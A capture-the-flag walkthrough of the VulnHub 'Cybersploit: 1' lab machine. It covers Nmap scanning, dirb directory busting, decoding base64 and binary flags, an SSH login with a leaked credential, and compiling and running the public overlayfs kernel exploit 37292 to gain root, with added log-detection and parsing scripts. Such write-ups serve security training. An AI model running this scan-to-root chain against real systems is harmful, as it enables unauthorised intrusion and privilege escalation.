Capture the flag walkthrough: Cybersploit 1 (VulnHub)


Introduction

This is a walkthrough for the Cybersploit: 1 capture the flag challenge, available on VulnHub. The machine is listed as beginner-friendly and there are three flags to be captured.

It is assumed you have the virtual machine up and running and accessible over the network from your host machine.

My setup is an old laptop booted into a live version of Kali Linux. I installed virt-manager in Kali in order to run the Cybersploit: 1 virtual machine. As a precautionary measure, the laptop is not connected to any network.

Note: As this is a beginner-level challenge, the walkthrough will be fairly detailed, explaining the commands used, discussing methodologies, and recording the findings in a notebook.

Scanning

A good first step is to run a port scan against the machine using Nmap. We'll start off with a quick scan, just to find any open ports. We can then perform an aggressive scan on the open ports which will hopefully tell us more about the services running behind them.

Quick scan

This quick and basic scan is a SYN scan, also known as a stealth scan. This is actually the default type of scan run by Nmap (provided the user has raw-packet privileges), so it's not strictly necessary to specify the scan type; however, I have included it to be explicit.

kali@kali:~$ sudo nmap -T4 -sS -p- 192.168.100.218
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-19 07:46 UTC
Nmap scan report for 192.168.100.218
Host is up (0.0016s latency)
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 52:54:00:37:8A:FD (QEMU virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.82 seconds

The following is an overview of the arguments passed to Nmap:

-T4: use the "aggressive" timing template, which speeds the scan up considerably on a fast, reliable local network.
-sS: perform a TCP SYN scan (this needs raw-packet privileges, hence sudo).
-p-: scan all 65535 TCP ports rather than Nmap's default of the 1000 most common ones.
192.168.100.218: the IP address of the target machine.

The results of the scan show that ports 22 and 80 are open, indicating the machine is most likely running an SSH and HTTP server. To be sure, let's run an aggressive scan.

Aggressive scan

Nmap provides the -A option which we can use to perform a more aggressive scan, running additional tests such as remote OS detection and service/version detection. These details are key when determining the vulnerabilities that may be present on the target machine.

An aggressive scan takes longer to run but now that we know which ports are open we can limit the scan accordingly.

kali@kali:~$ sudo nmap -T4 -sS -p22,80 -A 192.168.100.218
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-19 07:48 UTC
Nmap scan report for 192.168.100.218
Host is up (0.00063s latency)
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
|   2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
|_  256 ef:43:5b:d9:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache httpd 2.2.22 (Ubuntu)
|_http-title: Hello Pentester!
MAC Address: 52:54:00:37:8A:FD (QEMU virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.63ms 192.168.100.218

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 17.31 seconds

We pass the same arguments to Nmap, but limit the ports to be scanned to 22 and 80 and add the -A option. The results of the aggressive scan reveal some important information, in particular the SSH and HTTP server software running on the machine - OpenSSH 5.9p1 and Apache httpd 2.2.22.
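Nmap's port table is regular enough to parse, and doing so is the first step towards feeding scan results into notes or an inventory instead of retyping them. The following is an added example (not code from the original walkthrough): a small parser for the port lines of Nmap's normal output, with the sample input copied from the two scans above. The regular expression and the rendering into notes-style sections are my own assumptions about the format, not an Nmap API; for anything beyond a quick script, Nmap's -oX XML output is the stable interface.

```python
import re

# Port table lines copied from the two Nmap runs above. The quick scan has no
# VERSION column; the aggressive scan does, followed by NSE script output
# (lines beginning with '|') which the parser skips.
AGGRESSIVE_SCAN = """\
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_  256 ef:43:5b:d9:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache httpd 2.2.22 (Ubuntu)
MAC Address: 52:54:00:37:8A:FD (QEMU virtual NIC)
"""

# <port>/<proto>  <state>  <service>  [<version ...>]   (assumed layout of normal output)
PORT_LINE = re.compile(
    r"^(?P<port>\d{1,5})/(?P<proto>tcp|udp)\s+"
    r"(?P<state>open|closed|filtered|unfiltered|open\|filtered|closed\|filtered)\s+"
    r"(?P<service>\S+)(?:\s+(?P<version>.*\S))?\s*$"
)

def parse_ports(text):
    """One dict per port line in Nmap's normal (human-readable) output."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # column header, NSE output, MAC/OS lines, etc.
        records.append({"port": int(m["port"]), "proto": m["proto"], "state": m["state"],
                        "service": m["service"], "version": m["version"]})
    return records

def open_services(text):
    """{port: version string, or the bare service name when Nmap gave no version}."""
    return {r["port"]: r["version"] or r["service"]
            for r in parse_ports(text) if r["state"] == "open"}

def notes_section(text):
    """Render the open services in the same shape as the notes.md entries in this walkthrough."""
    lines = []
    for r in parse_ports(text):
        if r["state"] == "open":
            lines.append(f"## {r['service'].upper()} (port {r['port']}/{r['proto']})")
            lines.append(r["version"] or r["service"])
            lines.append("")
    return "\n".join(lines)

if __name__ == "__main__":
    print(notes_section(AGGRESSIVE_SCAN))
```

Running the script prints an "## SSH" and an "## HTTP" section with the version strings Nmap reported, ready to paste into the notebook; a line such as "139/tcp filtered netbios-ssn" from another scan parses too, with the state preserved so that filtered ports are not mistaken for open ones.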

Update the notebook

A great habit to get into is to record the information you discover in a notebook. The Nmap scan has provided us with some good initial information about the machine which we should jot down. Here's what my notes look like so far.

notes.md

# Machine Info

## General
IP: 192.168.100.218
OS: Ubuntu
Users:

## HTTP
Apache httpd 2.2.22

## SSH
OpenSSH 5.9p1

# Flags
Flag 1:
Flag 2:
Flag 3:

HTTP enumeration

Default web page

We know the machine is running the Apache web server which is listening on port 80. Let's visit the website in our browser (in my case the address is http://192.168.100.218) and check if a default web page is served. Sure enough, this is the case.

At first glance there doesn't appear to be anything particularly important[1], so let's view the source. Scrolling down to the bottom of the source there's a comment that appears to reveal a username.

<!------------- user:itsskv --------------------->

Let's make a note of that and add itsskv to the Users entry in the notes.

Directory busting

While it doesn't look like there's any other useful content on this web page we can try and find other directories and files that might be publicly accessible. One way to do this is directory busting, which is a brute-force dictionary attack on a web server. In short, for every entry in the dictionary (a long list of words) a program attempts to retrieve a directory or file on the web server with the same name.

There are a couple of popular programs, such as dirb and gobuster. Let's try dirb and see what results we get.

kali@kali:~$ dirb http://192.168.100.218

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Jul 20 04:55:34 2020
URL_BASE: http://192.168.100.218/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.122.106/ ----
+ http://192.168.100.218/cgi-bin/ (CODE:403|SIZE:291)  
+ http://192.168.100.218/hacker (CODE:200|SIZE:3757743)
+ http://192.168.100.218/index (CODE:200|SIZE:2333)
+ http://192.168.100.218/index.html (CODE:200|SIZE:2333)
+ http://192.168.100.218/robots (CODE:200|SIZE:79)
+ http://192.168.100.218/robots.txt (CODE:200|SIZE:79)
+ http://192.168.100.218/server-status (CODE:403|SIZE:296)

-----------------
END_TIME: Mon Jul 20 04:55:37 2020
DOWNLOADED: 4612 - FOUND: 7

Five entries came back with a 200, which means they are publicly accessible, but they correspond to three distinct files (/index and /robots appear to be /index.html and /robots.txt served without their extension, judging by the identical sizes): /hacker, which is the animated GIF; /index.html, the default page we have already seen; and /robots.txt[2]. Let's point our browser at http://192.168.100.218/robots.txt and take a look at this file (make sure to use the correct IP address of your target machine).

robots.txt

R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9

This looks rather interesting and could be an encoded message. A common encoding scheme is base64, so let's download the robots.txt file and try to decode its content.

kali@kali$ wget http://192.168.100.218/robots.txt
kali@kali$ cat robots.txt | base64 -d
Good Work!
Flag1: cybersploit{youtube.com/c/cybersploit}

That worked! We have the first flag.

If we didn't get a meaningful result when decoding via base64 we would then try other decoders. There are websites which will display a given string decoded using a variety of schemes.

Update the notebook

It's time to update the notebook, here's what mine looks like.

notes.md

# Machine Info

## General
IP: 192.168.100.218
OS: Ubuntu
Users: itsskv

## HTTP
Apache httpd 2.2.22

## SSH
OpenSSH 5.9p1

# Flags
Flag 1: cybersploit{youtube.com/c/cybersploit}
Flag 2:
Flag 3:

What now?

So, we've scanned the target machine with Nmap, explored the publicly accessible files and directories on the web server, and have found what we believe to be a username along with the first flag. Where do we go from here?

It doesn't look like there's a way to upload a file to the web server and attempt to use a server-side scripting language, such as PHP, to gain remote access. As we have what we believe to be a username, let's switch our focus to the SSH server and see if we can log in.

SSH enumeration

We could try to log into the SSH server as the user itsskv via a brute-force attack, using a tool such as hydra, however, before going down that path, I want to try a couple of obvious passwords, including the first flag.
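Both the dirb run in the HTTP enumeration section (4612 requests in about three seconds) and the hydra-style password guessing mentioned here leave a very recognisable trace in the server's logs, which is what a defender of this box would be looking for. The following is an added example, not code from the original walkthrough: a sliding-window burst detector applied to two constructed log samples, an Apache access log during a wordlist run (many 404s from one client in seconds) and an auth.log with repeated failed SSH logins. The log lines, the client addresses and the thresholds are all my own assumptions; the line formats are the standard Apache "combined" format and OpenSSH's "Failed password" message.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log lines (not taken from the target machine). First an
# Apache access log during a short dirb-style run: many 404s from one client
# within a couple of seconds. Then an auth.log with repeated failed SSH logins
# against the username found on the web page.
APACHE_ACCESS_LOG = """\
10.0.0.5 - - [20/Jul/2020:04:55:34 +0000] "GET /cgi-bin/ HTTP/1.1" 403 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
10.0.0.5 - - [20/Jul/2020:04:55:34 +0000] "GET /admin HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
10.0.0.5 - - [20/Jul/2020:04:55:34 +0000] "GET /backup HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
10.0.0.5 - - [20/Jul/2020:04:55:35 +0000] "GET /config HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
10.0.0.5 - - [20/Jul/2020:04:55:35 +0000] "GET /hacker HTTP/1.1" 200 3757743 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
10.0.0.5 - - [20/Jul/2020:04:55:35 +0000] "GET /old HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
10.0.0.5 - - [20/Jul/2020:04:55:36 +0000] "GET /test HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
10.0.0.9 - - [20/Jul/2020:04:57:10 +0000] "GET /index.html HTTP/1.1" 200 2333 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Jul/2020:05:10:00 +0000] "GET /missing HTTP/1.1" 404 209 "-" "Mozilla/5.0"
"""

AUTH_LOG = """\
Jul 20 05:01:01 cybersploit-CTF sshd[1201]: Failed password for itsskv from 10.0.0.5 port 50212 ssh2
Jul 20 05:01:02 cybersploit-CTF sshd[1201]: Failed password for itsskv from 10.0.0.5 port 50212 ssh2
Jul 20 05:01:02 cybersploit-CTF sshd[1203]: Failed password for itsskv from 10.0.0.5 port 50214 ssh2
Jul 20 05:01:03 cybersploit-CTF sshd[1205]: Failed password for invalid user admin from 10.0.0.5 port 50216 ssh2
Jul 20 05:01:04 cybersploit-CTF sshd[1207]: Failed password for itsskv from 10.0.0.5 port 50218 ssh2
Jul 20 05:01:05 cybersploit-CTF sshd[1209]: Accepted password for itsskv from 10.0.0.5 port 50220 ssh2
Jul 20 05:30:00 cybersploit-CTF sshd[1300]: Failed password for itsskv from 10.0.0.9 port 41000 ssh2
"""

# Apache "combined" format: client ip, identd, user, [timestamp], "request", status, size, ...
APACHE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) ')
# OpenSSH failed-login line (syslog timestamps carry no year, so the caller supplies it)
SSHD_FAIL_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_apache(text):
    for line in text.splitlines():
        m = APACHE_RE.match(line)
        if m:
            yield {"ip": m["ip"], "status": int(m["status"]), "request": m["req"],
                   "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")}

def parse_sshd_failures(text, year):
    for line in text.splitlines():
        m = SSHD_FAIL_RE.match(line)
        if m:
            yield {"ip": m["ip"], "user": m["user"],
                   "ts": datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")}

def burst_sources(events, threshold, window):
    """events: (timestamp, source) pairs. Returns {source: peak count} for every
    source that produced at least `threshold` events inside one sliding window."""
    recent = defaultdict(deque)
    flagged = {}
    for ts, src in sorted(events):
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:          # drop events that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged[src] = max(flagged.get(src, 0), len(q))
    return flagged

def web_scanners(log_text, threshold=5, window=timedelta(seconds=10)):
    """Clients hammering the server with 404s: the signature of a wordlist run."""
    events = [(r["ts"], r["ip"]) for r in parse_apache(log_text) if r["status"] == 404]
    return burst_sources(events, threshold, window)

def ssh_bruteforcers(log_text, year, threshold=3, window=timedelta(minutes=1)):
    """Clients with repeated failed SSH logins in a short period."""
    events = [(r["ts"], r["ip"]) for r in parse_sshd_failures(log_text, year)]
    return burst_sources(events, threshold, window)

if __name__ == "__main__":
    print("web scanners:", web_scanners(APACHE_ACCESS_LOG))
    print("ssh brute force:", ssh_bruteforcers(AUTH_LOG, 2020))
```

On the samples, 10.0.0.5 is flagged in both logs while 10.0.0.9 (one 404, one failed login) is not. The thresholds are deliberately low for the sample; on a real server they are tuned against normal traffic, and the SSH case is usually better handled by something like fail2ban, which does exactly this counting and then blocks the source. Note that the password in this walkthrough was guessed on the first attempt, which no rate-based detection catches; only credential hygiene (not reusing a published string as a password) covers that.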

kali@kali$ ssh itsskv@192.168.100.218
itsskv@192.168.100.218's password: <TYPE FLAG 1 HERE>
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)
...
itsskv@cybersploit-CTF:~$

We're in! Let's have a look around the file system and see what we can find.

itsskv@cybersploit-CTF:~$ ls -l
drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Desktop
drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Documents
drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Downloads
-rw-r--r-- 1 itsskv itsskv 8445 Jun 25 12:11 examples.desktop
-rw-rw-r-- 1 itsskv itsskv  495 Jun 27 10:03 flag2.txt
drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Music
drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Pictures
drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Public
drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Templates
drwxr-xr-x 2 itsskv itsskv 4096 Jun 25 19:04 Videos

The file flag2.txt looks promising, let's check it out.

itsskv@cybersploit-CTF:~$ cat flag2.txt
01100111 01101111 ... 00110001 01111101

We've found another file that contains encoded data, this time in binary. While there are many websites which will decode binary, my laptop wasn't connected to the Internet so I wrote the following Python program to decode the message.

decode_binary.py

# Read the whitespace-separated binary string from flag2.txt
with open('flag2.txt') as f:
    data = f.read().strip()

# Each 8-digit group is one ASCII character written in base 2;
# split on any whitespace so stray double spaces or newlines don't break int()
chars = data.split()
message = [chr(int(char, 2)) for char in chars]

print(''.join(message))

And if we run the program...

itsskv@cybersploit-CTF:~$ python decode_binary.py
good work !
flag2: cybersploit{https:t.me/cybersploit}

We now have the second flag!
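The two flags so far were hidden behind different encodings (base64, then binary), and the text above mentions trying other decoders when one doesn't give a readable result. The following is an added example, not code from the walkthrough, that generalises the author's decode_binary.py: it runs a small set of candidate decoders (8-bit binary groups, hex, base64) over a string and keeps only the results that come out as printable ASCII, which is the check that separates a real decoding from byte soup. The robots.txt string is the one shown above; every other sample is constructed.

```python
import base64
import binascii
import re
import string

# The robots.txt content shown above (copied from this walkthrough).
ROBOTS_TXT = "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9"

PRINTABLE = set(string.printable)

def as_text(raw):
    """Return raw as a str if it is ASCII and entirely printable, otherwise None."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text and all(c in PRINTABLE for c in text) else None

def decode_bits(s):
    """'01100111 01101111' -> b'go'. Accepts 8-digit groups separated by whitespace,
    or a single unbroken run whose length is a multiple of 8."""
    groups = s.split()
    if len(groups) == 1 and len(groups[0]) % 8 == 0:
        groups = [groups[0][i:i + 8] for i in range(0, len(groups[0]), 8)]
    if not groups or any(len(g) != 8 or set(g) - {"0", "1"} for g in groups):
        return None
    return bytes(int(g, 2) for g in groups)

def decode_hex(s):
    """Hex with optional whitespace or ':' separators, e.g. '66 6c 61 67'."""
    compact = re.sub(r"[\s:]", "", s)
    if not compact or len(compact) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", compact):
        return None
    return bytes.fromhex(compact)

def decode_b64(s):
    """Standard base64 (strict alphabet and padding), whitespace ignored."""
    compact = "".join(s.split())
    if len(compact) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", compact):
        return None
    try:
        return base64.b64decode(compact, validate=True)
    except binascii.Error:
        return None

DECODERS = [("binary", decode_bits), ("hex", decode_hex), ("base64", decode_b64)]

def guess_decodings(s):
    """Run every candidate decoder and keep only the results that are readable text."""
    results = {}
    for name, decode in DECODERS:
        raw = decode(s)
        text = as_text(raw) if raw is not None else None
        if text is not None:
            results[name] = text
    return results

if __name__ == "__main__":
    for name, text in guess_decodings(ROBOTS_TXT).items():
        print(f"[{name}]\n{text}")
```

A string of 0s and 1s is also valid hex and valid base64, which is why the printable-text filter matters: for "01100111 01101111 01101111 01100100" only the binary decoder survives, and for the robots.txt content only base64 does. The list of decoders is easy to extend (ROT13, URL encoding, nested layers) when a challenge calls for it.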

OS vulnerabilities

User privileges

We have access to the machine as the user itsskv but we don't know what privileges this user may or may not have. Let's check.

itsskv@cybersploit-CTF:~$ id
uid=1001(itsskv) gid=1001(itsskv) groups=1001(itsskv)

itsskv@cybersploit-CTF:~$ sudo -l
Sorry, user itsskv may not run sudo on cybersploit-CTF

The user itsskv doesn't have any privileges that will allow us to explore the file system without restriction. There may be files that have been given explicit permission to itsskv, however, instead of searching for those let's see if we can find a vulnerability that will allow us to elevate our privileges.

Linux kernel vulnerabilities

First we need to determine some basic information about the system we've logged into.

itsskv@cybersploit-CTF:~$ uname -sr
Linux 3.13.0-32-generic

itsskv@cybersploit-CTF:~$ lsb_release -a
Distributor ID: Ubuntu
Description:    Ubuntu 12.04.5 LTS
Release:        12.04
Codename:       precise

The kernel version is quite old, released back in 2014, so it's likely that we'll be able to find a privilege escalation vulnerability. Using the tool SearchSploit we can look for such exploits.

kali@kali:~$ searchsploit kernel 3.13
----------------------------------------- ----------------------
 Exploit Title                           |  Path
----------------------------------------- ----------------------
Android Kernel < 4.8 - ptrace seccomp Fi | android/dos/46434.c
Apple iOS < 10.3.1 - Kernel              | ios/local/42555.txt
Apple Mac OSX < 10.6.7 - Kernel Panic (D | osx/dos/17901.c
...
Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFO | linux/local/41995.c
Linux Kernel 3.13 - SGID Privilege Escal | linux/local/33824.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04 | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04 | linux/local/37293.txt
Linux Kernel 3.13.1 - 'Recvmmsg' Local P | linux/local/40503.rb
Linux Kernel 3.13/3.14 (Ubuntu) - 'splic | linux/dos/36743.c
...
Linux Kernel < 4.5.1 - Off-By-One (PoC)  | linux/dos/44301.c
macOS < 10.14.3 / iOS < 12.1.3 - Kernel  | multiple/dos/46300.c
----------------------------------------- ----------------------
Shellcodes: No Results

It looks like there are a few exploits that match both the kernel version and the distribution version. Let's try the first entry that matches both, which has the Path linux/local/37292.c; 37292 is the exploit identifier.
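Matching the kernel version against the searchsploit titles by eye works for one box, but the same comparison is what a patch-management review does across a fleet, and it is easy to get wrong because the titles mix ranges ("3.13.0 < 3.19"), single versions ("3.13", "3.13.1") and alternatives ("3.13/3.14"). The following is an added example, not part of the walkthrough or of searchsploit: it parses the version part of the titles in the table above and reports which rows cover the target kernel. The title grammar and the version-comparison rules are my assumptions about how these titles are written.

```python
import re

# Kernel release string from `uname -sr` above.
TARGET_KERNEL = "3.13.0-32-generic"

# Rows copied from the searchsploit table above. The titles are truncated to
# searchsploit's column width, exactly as they appear in that output.
SEARCHSPLOIT_ROWS = """\
Android Kernel < 4.8 - ptrace seccomp Fi | android/dos/46434.c
Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFO | linux/local/41995.c
Linux Kernel 3.13 - SGID Privilege Escal | linux/local/33824.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04 | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04 | linux/local/37293.txt
Linux Kernel 3.13.1 - 'Recvmmsg' Local P | linux/local/40503.rb
Linux Kernel 3.13/3.14 (Ubuntu) - 'splic | linux/dos/36743.c
Linux Kernel < 4.5.1 - Off-By-One (PoC)  | linux/dos/44301.c
"""

VER = r"\d+(?:\.\d+)*"
# Either "Linux Kernel [lower] < upper ..." (a half-open range) or
# "Linux Kernel x.y[/x.z] ..." (one or more specific version prefixes).
TITLE_RE = re.compile(
    rf"^Linux Kernel\s+(?:(?P<lower>{VER})\s*)?<\s*(?P<upper>{VER})"
    rf"|^Linux Kernel\s+(?P<exact>{VER}(?:/{VER})*)"
)

def parse_version(release):
    """'3.13.0-32-generic' -> (3, 13, 0); the distro ABI suffix is ignored."""
    m = re.match(r"^\d+(?:\.\d+)*", release)
    if not m:
        raise ValueError(f"not a kernel version: {release!r}")
    return tuple(int(p) for p in m.group(0).split("."))

def affected_by(title, target_release):
    """True/False if the title names a Linux kernel version or range and the
    target falls inside it; None if the title carries no usable version."""
    m = TITLE_RE.match(title)
    if not m:
        return None
    target = parse_version(target_release)
    if m.group("upper"):
        lower = parse_version(m.group("lower")) if m.group("lower") else (0,)
        return lower <= target < parse_version(m.group("upper"))
    # Specific versions: '3.13' covers every 3.13.x, '3.13.1' only that patch level.
    return any(target[:len(v)] == v
               for v in map(parse_version, m.group("exact").split("/")))

def triage(rows_text, target_release):
    """Paths of the searchsploit rows whose title version covers the target."""
    hits = []
    for row in rows_text.splitlines():
        if "|" not in row:
            continue
        title, path = (part.strip() for part in row.split("|", 1))
        if affected_by(title, target_release):
            hits.append(path)
    return hits

if __name__ == "__main__":
    for path in triage(SEARCHSPLOIT_ROWS, TARGET_KERNEL):
        print(path)
```

For the 3.13.0-32-generic kernel this selects six of the eight rows (the 3.13.1-only entry and the Android one drop out). Two caveats a reviewer would add: the titles say nothing about whether the distribution has backported a fix into its 3.13.0 package, so a version match over-reports on patched systems and under-reports where a title's range is narrower than the affected code; and a match in a "dos" path is a crash proof-of-concept, not a privilege escalation. The result is a list to verify against the distribution's security advisories, not a verdict.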

Update the notebook

Before we move onto the next stage of the attack, we should record this new information in the notes.

notes.md

# Machine Info

## General
IP: 192.168.100.218
Kernel: Linux 3.13.0-32-generic
Distribution: Ubuntu 12.04.5 LTS precise
Users: itsskv

## HTTP
Apache httpd 2.2.22

## SSH
OpenSSH 5.9p1

# Flags
Flag 1: cybersploit{youtube.com/c/cybersploit}
Flag 2: cybersploit{https:t.me/cybersploit}
Flag 3:

Building the exploit

The exploit we found is a program written in C which we will need to compile. We can find the full path to the source code for this program by running searchsploit with the -p option and passing the exploit identifier.

kali@kali:~$ searchsploit -p 37292
  Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/37292.c
     PATH: /usr/share/exploitdb/exploits/linux/local/37292.c
File Type: C source, ASCII text, with very long lines, with CRLF line terminators

Copy the C source file to a suitable location on your machine and compile it. As the target machine is running a 32-bit (i686) kernel, as shown in the SSH welcome banner above, we need to use the -m32 option with gcc, which generates 32-bit i386 code.

kali@kali:~$ cp /usr/share/exploitdb/exploits/linux/local/37292.c .
kali@kali:~$ gcc -m32 37292.c -o exploit

If you receive the compiler error bits/libc-header-start.h: No such file or directory then you will need to install the gcc-multilib package. Alternatively, you could copy the source file to the target machine and compile it there.

Running the exploit

Now that we have the exploit we just need to transfer it to the target machine and run it. We can use our SSH access to copy files to the machine.

kali@kali:~$ scp exploit itsskv@192.168.100.218:/home/itsskv/Downloads
itsskv@192.168.100.218's password: <TYPE FLAG 1 HERE>
exploit

Let's log into the target machine via SSH and run the exploit.

kali@kali$ ssh itsskv@192.168.100.218
itsskv@192.168.100.218's password: <TYPE FLAG 1 HERE>
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)
...
itsskv@cybersploit-CTF:~$ cd Downloads
itsskv@cybersploit-CTF:~$ ls
exploit
itsskv@cybersploit-CTF:~$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
#

The exploit ran successfully and we have a new prompt - the # symbol. Let's explore a little further.

# whoami
root
# cd /root
# ls
finalflag.txt
# cat finalflag.txt
...
flag3: cybersploit{Z3X21CW42C4 many many congratulations !}
...

We have the third and final flag!

Going over those commands, we ran whoami to check which user we were running as. It turned out to be the root user which means the privilege escalation worked. We then changed to the root user's home directory, listed the contents of the directory, and discovered the final flag.

Update the notebook

It's time to update the notebook, here's mine below.

notes.md

# Machine Info

## General
IP: 192.168.100.218
Kernel: Linux 3.13.0-32-generic
Distribution: Ubuntu 12.04.5 LTS precise
Users: itsskv

## HTTP
Apache httpd 2.2.22

## SSH
OpenSSH 5.9p1

# Exploits

## Linux kernel
Vulnerable to overlayfs local privilege escalation
https://www.exploit-db.com/exploits/37292

# Flags
Flag 1: cybersploit{youtube.com/c/cybersploit}
Flag 2: cybersploit{https:t.me/cybersploit}
Flag 3: cybersploit{Z3X21CW42C4 many many congratulations !}

Concluding thoughts

This was a fun, beginner-friendly capture the flag exercise which covered port scanning with Nmap, encoding/decoding, and using the Exploit Database (via searchsploit) to locate a suitable exploit.

Hopefully you enjoyed the exercise and are keen to try out another capture the flag challenge soon.


  1. I did wonder if some information had been encoded in the animated GIF via steganography but that didn't appear to be the case. 

  2. robots.txt is a file intended to be read by bots, providing instructions on how to crawl the site. It's a good idea to check for the presence of a robots.txt file as it can certainly reveal important information about the web site.